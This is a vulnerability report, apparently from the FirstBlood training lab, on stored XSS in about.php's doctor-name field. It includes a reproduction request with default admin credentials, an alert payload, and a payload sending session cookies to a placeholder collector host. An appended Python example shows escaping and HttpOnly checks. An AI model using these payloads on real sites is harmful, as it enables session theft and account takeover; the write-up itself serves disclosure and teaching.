FirstBlood-#1576 Stored XSS on about.php's doctor of the month field
This issue was discovered on FirstBlood v3



On 2022-12-11, 0xblackbird Level 5 reported:

Summary:

Hi mate!

I hope you're doing great today!

I found a stored XSS vulnerability on /about.php. The doctor of the month's name parameter is reflected in the source code without being filtered or escaped correctly. This means we only need to change doctor Jon's name to an XSS payload.

Possible cause:

The developers thought that there was no way to change the path of the profile picture but forgot that invoking the API directly is still an option.

Impact:

I was able to execute JavaScript code on any user's/doctor's behalf. Moreover, I was also able to steal the sensitive session cookie, as it is not an HttpOnly cookie. This allowed me to successfully take over the doctor's account.

Steps to reproduce:

1) Log in using the default credentials admin:admin:

2) Next, replicate the following request:

POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: {HOST}
Cookie: drps={SESS_COOKIE}
Content-Type: application/x-www-form-urlencoded

drid=3&name=xyz"><img src="x" onerror="alert(document.domain)"&bio=&bookable=0

3) Finally, visit /about.php. A popup should be displayed with the document's domain:

We can easily elevate our privileges by taking over the doctor's account, as the cookies are not set to be HttpOnly. To do so, we could put the following payload in the phone parameter to steal and send the cookies back to us:

xyz"><img src="x" onerror="location.href=`//{BURP_COLLABORATOR}/collector?cookies=${document.cookie}`"

Next, visit the endpoint again: /about.php

Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:

Mitigation:

I highly recommend encoding any user input and validating it before reflecting it in the response.

Kind regards,

0xblackbird

P2 High

Endpoint: /about.php

Parameter: name

Payload: "><img src="x" onerror="alert(document.domain)"


FirstBlood ID: 56
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /about.php endpoint via a malicious doctor's name.
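The following Python is an added illustration of this finding; it is not FirstBlood code and not part of 0xblackbird's report. It builds the edit-dr.php form body from the fields in the report's request, renders the stored name the way about.php is assumed to (the TEMPLATE markup is an assumption, since the real page source is not shown here) both without escaping and with contextual HTML encoding, and parses each result to count the elements and on* event handlers a browser would act on. It also includes the two checks a retester would want: whether the payload comes back verbatim rather than as entities, and whether the session cookie is missing HttpOnly, which is the condition the cookie-stealing step depends on. All function names are hypothetical helpers for this example.

```python
"""Stored XSS via the doctor-of-the-month name: request, rendering, and checks.

Added example, not FirstBlood's or the reporter's code. Assumed: the about.php
markup in TEMPLATE (the real markup is not on the page) and the edit-dr.php
field order, which is taken from the report's request.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Payload exactly as used in step 2 of the report.
PAYLOAD = 'xyz"><img src="x" onerror="alert(document.domain)"'


def edit_doctor_body(drid: int, name: str, bio: str = "", bookable: int = 0) -> str:
    """Form body for POST /drpanel/drapi/edit-dr.php, fields as in the report."""
    return urlencode({"drid": drid, "name": name, "bio": bio, "bookable": bookable})


# Hypothetical fragment of about.php: the stored name lands inside an attribute.
TEMPLATE = '<img class="dotm" src="/img/doctor.png" alt="Doctor of the month: {name}">'


def render_vulnerable(name: str) -> str:
    """Raw interpolation: the stored value closes the alt attribute and the tag."""
    return TEMPLATE.format(name=name)


def render_fixed(name: str) -> str:
    """Contextual output encoding. quote=True also encodes ' and ", which is what
    makes the value safe inside a quoted attribute and not only in text nodes."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


class _Audit(HTMLParser):
    """Records start tags and any on* attributes, i.e. what a browser would run."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)
        self.handlers.extend(k for k, _ in attrs if k.lower().startswith("on"))


def injected_elements(markup: str) -> tuple[int, list[str]]:
    """Return (number of <img> tags, event-handler attribute names) in the markup."""
    p = _Audit()
    p.feed(markup)
    p.close()
    return p.tags.count("img"), p.handlers


def name_reflected_unescaped(page: str, name: str) -> bool:
    """Retest check: a name that contains markup characters appears verbatim in
    the response instead of as &quot;/&lt;/&gt; entities."""
    return name in page


def cookie_readable_by_script(set_cookie: str) -> bool:
    """True when a Set-Cookie header lacks HttpOnly, so document.cookie exposes
    it (the condition the report's cookie-stealing payload relies on)."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    print(edit_doctor_body(3, PAYLOAD))
    print(render_vulnerable(PAYLOAD))
    print(injected_elements(render_vulnerable(PAYLOAD)))  # (2, ['onerror'])
    print(injected_elements(render_fixed(PAYLOAD)))       # (1, [])
```

The encoding fix alone closes the injection; marking the drps cookie HttpOnly (and Secure) is a separate hardening step that limits what a future XSS can read, which is why the two checks are kept apart.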